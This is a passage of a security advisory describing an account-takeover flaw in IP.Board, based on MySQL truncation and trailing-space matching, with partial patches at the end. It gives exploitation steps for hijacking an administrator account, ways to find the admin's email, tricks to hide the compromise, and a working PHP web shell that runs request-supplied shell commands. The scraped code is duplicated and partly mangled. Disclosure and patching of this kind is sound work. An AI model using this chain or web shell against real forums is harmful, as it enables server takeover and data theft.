Beruflich Dokumente
Kultur Dokumente
attacker to take over the admin account without prompting any alert but preventi
ng the real admin to login afterwards. After a successful takeover, the attacker
can plant a PHP backdoor using IPB s templating system. Thorough administrators w
ill inspect total file system after they recover their hacked account, while oth
er administrators might assume they are dealing with a bug, receive their new pa
ssword using Password recovery system and leave the backdoor intact. Attacker may
also use the Retrieve password process to mislead the admin into thinking their ac
count was locked due to unsuccessful login attempts and not investigating furthe
r, thus preserving the backdoor.
B) Required data
1) Administrator s login name
The admin login is easily found by clicking on The moderating Team link on recent
IPB s footer, or using the URL below: index.php?app=forums&module=extras§ion=s
tats&do=leaders
2) Administrator s e-mail
Obtaining the admin e-mail may be more complicated as there is no automated way
to get it. The attacker can get it through:
using whois on domain.tld to get registrar informations
looking up a prospective e-mail on Facebook and see if a matching profile shows
up
using Gravatar (Gravatar is a personal avatar you can find on most blogs, forum,
etc comments based on user e-mail address). Attacker can create a script to ret
rieve an email based on an avatar. For example mine is: http://www.john-jean.com
/gravapwnd.php?zboob=john@wargan.com
do sourcing using FB, G+, Twitter, Google SERP,
use SE methods, such as faked e-mail catcher; or use XSSs on known websites cons
ulted by the target.
C) Explanation
This vulnerability is grounded on both a mistake in MySQL knowledge and bad sani
tization of the $email variable.
First of all, let s summarize how MySQL works:
Truncating while INSERT
During an INSERT query, if the string exceeds the field size defined when creati
ng the table, the string will be truncated. E.g.:
CREATE TABLE `test` (
`limitvarchar` varchar(5) NOT NULL
);
--INSERT INTO `test` (`limitvarchar`) VALUES ('123456789');
--SELECT * FROM `test`
> 12345
1
2
3
4
5
6
7
8
CREATE TABLE `test` (
`limitvarchar` varchar(5) NOT NULL
);
--INSERT INTO `test` (`limitvarchar`) VALUES ('123456789');
--SELECT * FROM `test`
> 12345
However, the string is not truncated during SELECT queries. The following query
will not return any result:
SELECT * FROM `test` WHERE `limitvarchar` = "123456"
1
SELECT * FROM `test` WHERE `limitvarchar` = "123456"
MySQL use permissive SELECT:
SELECT ignores spaces at the end of strings. Let s INSERT some datas:
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1
');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 ');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 ');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 ');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1');
1
2
3
4
5
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1
');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 ');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 ');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 ');
INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1');
Thus the following query will yield the 5 records inserted before:
SELECT * FROM `test` WHERE limitvarchar='1
'
1
SELECT * FROM `test` WHERE limitvarchar='1
'
Now, let s have a look at the checkEmailAddress function of admin/source/base/core
.php:
/**
* Check email address to see if it seems valid
*
* @param string Email address
* @return boolean
* @since 2.0
*/
static public function checkEmailAddress( $email = "" )
{
$email = trim($email);
$email = str_replace( " ", "", $email );
34
35
36
37
/**
* Check email address to see if it seems valid
*
* @param string Email address
* @return boolean
* @since 2.0
*/
static public function checkEmailAddress( $email = "" )
{
$email = trim($email);
$email = str_replace( " ", "", $email );
//----------------------------------------// Check for more than 1 @ symbol
//----------------------------------------if ( substr_count( $email, '@' ) > 1 )
{
return FALSE;
}
if ( preg_match( '#[\;\#\n\r\*\'\"<>&\%\!\(\)\{\}\[\]\?\\/\s\,]#', $email ) )
{
return FALSE;
}
/* tld increased to 32 characters as per RFC - http://community.invisionpower.co
m/resources/bugs.html/_/ip-board/ipstextcheckemailaddress-does-not-match-new-201
3-tlds-r41518 */
else if ( preg_match( '/^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,32}|[0-9]{1,4})(
\]?)$/', $email) )
{
return TRUE;
}
else
{
return FALSE;
}
}
As you may know, trim only removes whitespace (and some others) characters BEFOR
E and AFTER the string, that is why IPB core team also use str_replace to remove
space chars IN the email string. However, this treatment is performed to change
the email address to the correct format. This is done to ensure the next steps
of the check, but there will be no condition returning false if string has been
trim or if str_replace has been used. This function checks an email validity for
mat used in the register form and the change email form.
Let s take a look at a another function called load( $member_key, $extra_tables= all ,
$key_type= ) in admin/sources/base/ipsMember.php
static public function load( $member_key, $extra_tables='all', $key_type='' )
{
//----------------------------------------// INIT
//----------------------------------------$member_value
= 0;
$members
=
$multiple_ids
=
$member_field
=
$joins
=
$tables
=
'groups' => 0, 'sessions'
$remap
=
array();
array();
'';
array();
array( 'pfields_content' => 0, 'profile_portal' => 0,
=> 0, 'members_partial' => 0 );
array( 'extendedProfile'
=> 'profile_portal',
'customFields'
=> 'pfields_content');
//----------------------------------------// ID or email?
//----------------------------------------if ( ! $key_type )
{
if ( is_array( $member_key ) )
{
$multiple_ids = array_map( 'intval', $member_key ); // Bug #2090
8
$member_field = 'member_id';
}
else
{
if ( strstr( $member_key, '@' ) )
{
$member_value = "'" . ipsRegistry::DB()->addSlashes( strtolo
wer( $member_key ) ) . "'";
$member_field = 'email';
}
else
{
$member_value = intval( $member_key );
$member_field = 'member_id';
}
}
}
[...]
case 'email':
if ( is_array( $member_key ) )
{
array_walk( $member_key, create_function( '&$v,$k', '$v=
"\'".ipsRegistry::DB()->addSlashes( strtolower( $v ) ) . "\'";' ) );
$multiple_ids = $member_key;
}
else
{
$member_value = "'" . ipsRegistry::DB()->addSlashes( str
tolower( $member_key ) ) . "'";
}
$member_field = 'email';
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
static public function load( $member_key, $extra_tables='all', $key_type='' )
{
//----------------------------------------// INIT
//----------------------------------------$member_value
= 0;
$members
=
$multiple_ids
=
$member_field
=
$joins
=
$tables
=
'groups' => 0, 'sessions'
array();
array();
'';
array();
array( 'pfields_content' => 0, 'profile_portal' => 0,
=> 0, 'members_partial' => 0 );
$remap
= array( 'extendedProfile'
'customFields'
=> 'profile_portal',
=> 'pfields_content');
//----------------------------------------// ID or email?
//----------------------------------------if ( ! $key_type )
{
if ( is_array( $member_key ) )
{
$multiple_ids = array_map( 'intval', $member_key ); // Bug #2090
8
$member_field = 'member_id';
}
else
{
if ( strstr( $member_key, '@' ) )
{
$member_value = "'" . ipsRegistry::DB()->addSlashes( strtolo
wer( $member_key ) ) . "'";
$member_field = 'email';
}
else
{
$member_value = intval( $member_key );
$member_field = 'member_id';
}
}
}
[...]
case 'email':
if ( is_array( $member_key ) )
{
array_walk( $member_key, create_function( '&$v,$k', '$v=
"\'".ipsRegistry::DB()->addSlashes( strtolower( $v ) ) . "\'";' ) );
$multiple_ids = $member_key;
}
else
{
$member_value = "'" . ipsRegistry::DB()->addSlashes( str
tolower( $member_key ) ) . "'";
}
$member_field = 'email';
As you can see, this function does not perform any verification on the length of
$member_key & $v. We will exploit that in the next part.
D) Exploitation
Previously, on this adviso: we saw that $email is not rejected if it contains sp
urious whitespace, and that $member_key & $v length is not checked. We also saw
some MySQL use-cases. Let s see how we can exploit that:
The e-mail field from the members table in IPB is declared as a varchar(150).
Upon registration, we fill the mail member (or admin) for which we want to steal
the account to which we add a padding space for the size of the string exceeds
150. Then we add any character after the space one. It is necessary to bypass aj
ax s validator, feel free to use Burp Suite or Tamperdata.
<php>
if(isset($_REQUEST['pwnd']))
{
$pwnd=$_REQUEST['pwnd'];
echo `$pwnd`;
}
</php>
1
2
3
4
5
6
7
8
<php>
if(isset($_REQUEST['pwnd']))
{
$pwnd=$_REQUEST['pwnd'];
echo `$pwnd`;
}
</php>
<php> & </php> markups are used by the IPB s templating system to add inline PHP c
ode. characters in PHP are used to do system calls.
Once such a backdoor has been planted, any part of public_html can be compromise
d and it may also lead to privilege escalation on a dedicated server or LAN.
index.php?lolz=ls%20/
returns:
bin boot build dev etc home initrd.img initrd.img.old
onexistent opt proc root run sbin selinux srv sys tmp
d
1
2
3
index.php?lolz=ls%20/
returns:
bin boot build dev etc home initrd.img initrd.img.old
onexistent opt proc root run sbin selinux srv sys tmp
d
[II] Mitigation
A) Patch party !
These are two quick & dirty patches, but they work.
admin/source/base/core.php should be:
/**
* Check email address to see if it seems valid
*
* @param string
Email address
* @return boolean
* @since 2.0
*/
26
27
28
29
30
31
32
33
34
35
36
37
38
/**
* Check email address to see if it seems valid
*
* @param string
Email address
* @return boolean
* @since 2.0
*/
static public function checkEmailAddress( $email = "" )
{
if (strlen($email) > 150) return FALSE;
email = trim($email);
$email = str_replace( " ", "", $email );
//----------------------------------------// Check for more than 1 @ symbol
//----------------------------------------if ( substr_count( $email, '@' ) > 1 )
{
return FALSE;
}
if ( preg_match( '#[\;\#\n\r\*\'\"<>&\%\!\(\)\{\}\[\]\?\\/\s\,]#', $email )
)
{
return FALSE;
}
/* tld increased to 32 characters as per RFC - http://community.invision
power.com/resources/bugs.html/_/ip-board/ipstextcheckemailaddress-does-not-match
-new-2013-tlds-r41518*/
else if ( preg_match( '/^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,32}|[0-9
]{1,4})(\]?)$/', $email) )
{
return TRUE;
}
else
{
return FALSE;
}
}
Enforces the e-mail variable to be shorter than 150 characters.
admin/source/base/ipsMember.php should be:
http://www